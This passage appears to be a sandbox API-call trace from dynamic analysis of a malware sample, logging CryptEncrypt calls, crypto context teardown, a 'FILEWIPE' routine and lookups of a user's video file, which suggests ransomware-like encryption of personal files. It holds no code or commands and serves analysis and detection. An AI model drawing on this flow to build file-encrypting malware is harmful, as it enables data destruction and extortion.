RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0197.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0197.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0197.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0197.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.526] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.526] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.526] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.526] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.526] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.526] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.526] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0197.526] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.526] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0197.526] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0197.527] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.527] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1443f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14440) returned 1 [0197.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.528] CharLowerBuffW (in: lpsz="byte[83009]", cchLength=0xb | out: lpsz="byte[83009]") returned 0xb [0197.528] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.530] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.530] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.530] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.533] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.533] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa87898*, pdwDataLen=0x87e820*=0x1443f, dwBufLen=0x14440 | out: pbData=0xa87898*, pdwDataLen=0x87e820*=0x14440) returned 1 [0197.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0197.534] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.537] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.537] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0197.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.537] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.537] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0197.538] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.538] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.538] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.538] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0197.538] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.538] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.538] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0197.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.547] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0197.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.556] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0197.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.556] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0197.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.556] CryptDestroyKey (hKey=0x90aed8) returned 1 [0197.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.556] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.557] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.557] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.557] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.557] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0197.557] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0197.557] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0197.557] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0197.557] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.558] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.558] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0197.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.558] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.558] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.558] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.558] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.558] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.558] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.558] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.559] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.559] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.559] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.559] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.559] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0197.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0197.559] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0197.559] FreeLibrary (hLibModule=0x74f20000) returned 1 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0197.559] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0197.560] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.561] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.562] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.562] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0197.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0197.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.562] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.swf", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf740040, ftCreationTime.dwHighDateTime=0x1d5e0c4, ftLastAccessTime.dwLowDateTime=0x6074a350, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x6074a350, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0x1443f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="93QZ.swf", cAlternateFileName="")) returned 0x90af58 [0197.562] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0197.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.563] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.563] CharLowerBuffW (in: lpsz="byte[83007]", cchLength=0xb | out: 